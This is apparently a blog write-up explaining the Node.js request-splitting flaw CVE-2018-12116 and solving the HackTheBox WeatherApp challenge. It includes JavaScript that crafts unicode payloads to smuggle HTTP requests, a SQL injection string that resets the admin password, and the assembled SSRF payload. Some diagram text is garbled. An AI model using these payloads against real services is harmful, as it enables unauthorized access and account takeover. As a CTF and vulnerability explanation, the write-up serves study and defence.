Node request splitting vulnerability

Before versions 6.15.0 and 8.14.0, node used to corrupt non-latin1 characters in its http module. Using this bug, someone writing http.get("http://some.example/route/Ŕ") was actually sending a request to http://some.example/route/T. Apart from being unexpected, it led to the discover of CVE-2018-12116. With this vulnerability, it was possible to bypass node’s http module filtering to inject HTTP control characters and therefore perform several HTTP requests in a single call to http.get().

It means that a server executing http.get("http://${userDefinedVariable}"), would allow the user to send arbitrary request to any server, including POST, PUT or DELETE requests.

The WeatherApp challenge from HackTheBox is a good example to this vulnerability.

Disclaimer: the post contains a complete walkthrough of all steps of the this HackTheBox challenge.


Node’s http.get function and HTTP specification

The magic behind http.get(someURL), is that node is transforming the URL into a valid HTTP request. When the URL is parsed by node, it becomes a HTTP request object which is then converted to a sequence of bytes that fulfills HTTP specification.

N N o o d C H d e o T e n O C T v b o P e j n r e v R t c e e t r s H t p T t o T o B n P y s S B t e S e R y e e n e t s O n d q e b d e u s t j e r e o e r s c T t > t > T C C P S S < P e e s n n s o d d o c c k t t k e h h e t r r t o o u u g g h h t t h h e e R R e i i e c n n c e t t e i e e i v r r v e n n e r e e r t > t T T C C < C P H o P C T n s o T v O s o n P e b o c v r j c k e R t e k e r e c e t t q H t t u T B e T t y s P o R t t R e e R B e c s O e y c e b s t e i t j p e i v o e o s v e c n e r t s r > e a a p p p p l l i i c c a a t t i i o o n n

During this process, node cannot just split the URL in 3 parts (schema, host and route), because each of these parts may interfere with HTTP control characters. HTTP control characters have a meaning in HTTP specification, for example, the two bytes \r\n are used to separate each header in a single HTTP request, and \r\n\r\n are used to separate the headers from the body of the request. A valid HTTP request looks like the following:

GET /route/myroute HTTP/1.1
Host: some.example
Content-Length: 0

It has only one \r\n between each header and no \r\n\r\n in the header. It is therefore important for node to encode the characters \r and \n (and other control characters) if they appear in the URL, otherwise, an URL like https://some.example/route/\r\n\r\nmyroute, would be converted to the sequence of bytes below, and won’t be a valid HTTP sequence of bytes.

GET /route

myroute HTTP/1.1
Host: some.example
Content-Length: 0

For the converted sequence of bytes to be valid, https://some.example/route/\r\n\r\nmyroute will be percent encoded like the HTTP request below.

GET /route/%C4%8D%C4%8A%C4%8D%C4%8Amyroute HTTP/1.1
Host: some.example
Content-Length: 0

Let’s suppose we have a sequence of bytes and ask ourselves what is separating a HTTP request from the following one? The answer is simple, the end of the first HTTP request is the end of the body plus \r\n\r\n. This is why sending the following sequence of bytes to a TCP socket is triggering two HTTP requests. From now, if we are able to inject control characters, we are able to trick node’s http module into building a sequence of bytes that will be understood as two HTTP requests. This last technique is called request splitting.

GET /route/legitimate HTTP/1.1
Host: some.example
Content-Length: 0

GET /evil/request HTTP/1.1
Host: some.example
Content-Length: 0

Character encoding

Encoding is not something trivial, so let’s try to explain a few things.

UTF-8 encoding and unicode character set

Unicode (or Universal Coded Character Set) is a character set that defines 1 112 064 character code points (= different characters). Telecommunication usually uses the famous UTF-8 encoding which is a standard character encoding. UTF-8 uses 8 bits (= 1 byte) code units and is a variable-length encoding, it uses 1 to 4 bytes to code a single code-point.

UTF-8 was designated to be backward compatible and therefore uses the same code to encode ASCII characters (ASCII has 128 characters and is both a character set and an encoding format).

Code points that are more often used are coded using fewer bytes (think of ASCII characters) so that UTF-8-encoded text are not that big.

ISO-8859-1 encoding and latin1 character set

ISO/IEC 8859 is a series of standards that defines 8-bits character encoding. ISO-8859-1 (or ISO/IEC 8859-1) encodes the latin1 character set, also known as “Latin alphabet no. 1”. latin1 is a set of 191 characters from latin script.

ISO-8859-1 has several characteristics:

  • it is based on ASCII, meaning that the first 128 code-points are using the same code
  • it is a fixed-length encoding with a 8-bits code-unit, meaning all code-points will be a single byte

latin1 is also a registered alias of ISO-8859-1, I’ll use same denomination later in this page.

According to the standard, it should have been the default encoding of documents delivered via HTTP with MIME type beginning with “text/”.

The 256 code-points of latin1 are identical to the first 256 code-points of Unicode but are not coded using the same code in UTF-8 and ISO-8859-1 (especially code-points outside the ASCII range). This means that a latin1 text can be represented as a Unicode text but not with the same byte sequence.


Controlling the output

The first method to control what will be printed to the wire is to emulate the behavior of node.

Let’s start by creating functions that will emulate what node will output to the wire.

function emulateDecodeReceivedInput(byteList) {
  return Buffer.from(byteList).toString('UTF-8')
}

function emulateEncodeString(utf8string) {
  // Since utf8string is a standard javascript string,
  // the operation of decoding a UTF-8 encoded string with latin1 encoding
  // cannot convert all possible unicode characters. This is exactly the
  // intended behavior.
  return Buffer.from(utf8string, 'latin1')
}

Since we need to understand what is printed to the wire, we also need a function to print a list of bytes in the way it will be understood by the node server (UTF-8-decoded)

function printByteList(byteList) {
  console.log(Buffer.from(byteList).toString('UTF-8'));
}

We know that UTF-8 can represent characters with 1 to 4 bytes where latin1 only uses 1 byte. Since node is representing strings objects with UTF-8 encoding, some two bytes sequences sequence will be transformed to other bytes by node. That being said, we can iterate over all possible two bytes sequences to find out how they will be understood and transformed by node.

function printInternalStringAndTransformedString(byteList) {
  printByteList(byteList)
  printByteList(emulateEncodeString(emulateDecodeReceivedInput(byteList)))
}

Let’s choose one valid UTF-8 printable character from its character table. I chose the U+0148 latin letter, which is represented by the hex numbers c5 88.

printInternalStringAndTransformedString([197, 136]);
// Output
// ň
// H

We assume that if we have an latin1 text, we can compute a text composed of two-bytes UTF-8 characters that will be transformed by node to produce the text. To compute the Unicode text, we will take each character of the latin1 text, and compute the valid two-bytes UTF-8 character.

function getLatin1toUnicodeMap() {
  // latin1toUnicodeMap is built so that latin1toUnicodeMap[wantedCharacter] is a list
  // of unicode Strings we have to send to the node server to create the wanted output
  const latin1toUnicodeMap = {};
  for (let a = 0; a < 256; a++) {
    for (let b = 0; b < 256; b++) {
      const sourceBytes = [a, b];
      const utf8string = emulateDecodeReceivedInput(sourceBytes);
      const outputtedBytes = emulateEncodeString(utf8string);
      const stringOfBytesSentToWire = emulateDecodeReceivedInput(outputtedBytes);

      if (!latin1toUnicodeMap[stringOfBytesSentToWire]) {
        latin1toUnicodeMap[stringOfBytesSentToWire] = [];
      }
      latin1toUnicodeMap[stringOfBytesSentToWire].push(utf8string);
    }
  }
  return latin1toUnicodeMap
}

function computeText(latin1text, latin1toUnicodeMap) {
  let unicodeText = "";
  for (let i = 0; i < latin1text.length; i++) {
    latin1character = latin1text[i];
    if (latin1toUnicodeMap[latin1character]) {
      // Let's take the first character of the list
      unicodeText += latin1toUnicodeMap[latin1character][0];
    } else {
      console.log("ERROR, no unicode character for this latin1 character:", latin1character);
    }
  }
  return unicodeText;
}

We just have to write the last part of the script

const latin1toUnicodeMap = getLatin1toUnicodeMap();
const latin1text = "Try to compute this latin1 text composed of printable\nand unprintable characters";
const unicodeText = computeText(latin1text, latin1toUnicodeMap);
console.log(unicodeText);
// Output:
// ŔŲŹĠŴůĠţůŭŰŵŴťĠŴŨũųĠŬšŴũŮıĠŴťŸŴĠţůŭŰůųťŤĠůŦĠŰŲũŮŴšŢŬťĊšŮŤĠŵŮŰŲũŮŴšŢŬťĠţŨšŲšţŴťŲų

// Verification
printByteList(emulateEncodeString(unicodeText));
// Output:
// Try to compute this latin1 text composed of printable
// and unprintable characters

Note that the method will work for both printable and unprintable latin1 characters.


Solving hackthebox WeatherApp challenge

Analysis of source code

Let’s look a bit at the source code of the application.

WeatherApp
├── database.js
├── flag
├── helpers
│   ├── HttpHelper.js
│   └── WeatherHelper.js
├── index.js
├── package.json
├── package-lock.json
├── routes
│   └── index.js
├── static
│   ├── css
│   │   └── main.css
│   ├── favicon.gif
│   ├── host-unreachable.jpg
│   ├── js
│   │   ├── koulis.js
│   │   └── main.js
│   ├── koulis.gif
│   └── weather.gif
└── views
    ├── index.html
    ├── login.html
    └── register.html

The first thing to notice is that the package.json file has a nodeVersion: v8.12.0 key which is vulnerable to CVE-2018-12116. Looking into /routes/index.js shows all API routes and their code:

  • GET /: sending the static views/index.html file
  • GET /register: sending the static views/register.html file
  • POST /register: expecting username and password in a json object in the body, but only accessible from 127.0.0.1 because of the req.socket.remoteAddress.replace(/^.*:/, '') != '127.0.0.1' check
  • GET /login: sending the static views/login.html file
  • POST /login: expecting username and password in a json object in the body, checks if the username and password exists in database, checks if the username is admin and then send the flag. It throws an error if any of the checks fails
  • POST /api/weather: expecting endpoint, city and country in a json object in the body and sending a request with http.get

First of all, adding a X-Forwarded-For header does not help bypassing the 127.0.0.1 check here because the socket’s remote address is checked, not the sender address found in the request.

If we look closer at the POST /register route. The code that creates a user in database is as below, and is vulnerable to SQL injections.

new Promise(async (resolve, reject) => {
  try {
    let query = `INSERT INTO users (username, password) VALUES ('${user}', '${pass}')`;
    resolve((await this.db.run(query)));
  } catch(e) {
    reject(e);
  }
});

We still can’t reach the POST /register endpoint, but since node is using a vulnerable http.get function, we trick it into sending a POST request to 127.0.0.1/register, which would bypass the “127.0.0.1 check”.

let weatherData = await new Promise((resolve, reject) => {
  http.get(`http://${endpoint}/data/2.5/weather?q=${city},${country}&units=metric&appid=${apiKey}`, res => {
    let body = '';
    res.on('data', chunk => body += chunk);
    res.on('end', () => {
      try {
        resolve(JSON.parse(body));
      } catch(e) {
        resolve(false);
      }
    });
  }).on('error', reject);
});

If everything works as expected, we should be able to use the /api/weather route to trick node into sending the malicious SQL injection payload to the /register route. We have to:

  1. Create a payload that leverage the SQL injection to change the admin password
  2. Create a valid POST HTTP request that embeds the SQL injection payload
  3. Wrap this HTTP request and encode it using the computeText function
  4. Use this computed unicode text in the endpoint parameter of the /api/weather to trigger CVE-2018-12116
B B u u r N r p o p n - l a t i n 1 c h P a P O r O S a S T c T t / e / a r a p s > p i i / C / w r w e a e a f a t t t h e h e d e r r H T T P r P e P O q O S u S T e T s / t > / r r e S e g Q g i L i s s t i t e n e r j r e c t i o n p a y l D o D a a a t d > t a a b b a a s s e e

SQL injection

Let’s start with the SQL injection, which is pretty easy. We want to make the server execute the INSERT INTO users (username, password) VALUES ('admin', '') ON CONFLICT (username) DO UPDATE SET password='1234' to override the admin’s password. The payload should then be ') ON CONFLICT (username) DO UPDATE SET password='1234';--.

The HTTP request should then be as below.

const sqlInjectionPayload = "') ON CONFLICT (username) DO UPDATE SET password='1234';--";
const body = `username=admin&password=${encodeURIComponent(sqlInjectionPayload)}`
const registerHTTPrequest = `POST /register HTTP/1.1\r
Host: 127.0.0.1\r
Connection: close\r
Content-Type: application/x-www-form-urlencoded\r
Content-Length: ${body.length}\r
\r
${body}\r
\r
`;

I validated the above request by running the code of WeatherApp in local and running the request in burp repeater.

SSRF using CVE-2018-12116

Remember we wrote a computeText function to exploit CVE-2018-12116. We just have to use this function to make node perform the POST request on our behalf.

The payload we have to choose is then containing the request we crafted earlier.

const cvePayload = ` HTTP/1.1\r
Host: 127.0.0.1\r
\r
${registerHTTPrequest}GET /index?`;

const latin1toUnicodeMap = getLatin1toUnicodeMap();
const maliciousEndpointPayload = "127.0.0.1/" + computeText(cvePayload, latin1toUnicodeMap);
console.log(maliciousEndpointPayload);

Using maliciousEndpointPayload as the content of the endpoint parameter in /api/weather will make node send the following sequences of HTTP request.

GET / HTTP/1.1
Host: 127.0.0.1

POST /register HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

username=admin&password=sqliPayload

GET /index?%2Fdata%2F2.5%2Fweather%3Fq%3Dhere%2Cthere%26units%3Dmetric%26appid%3D1337
Host: 127.0.0.1

Get the flag

We can then log in with the admin account and get the flag.


Sources and references

Blog post from Ryan F. Kelly

Github issue discussing the bug

Differences between ASCII, ISO-8859 and Unicode

Wikipedia page of ISO-8859

Wikipedia page of UTF-8

Understanding what a codepoint is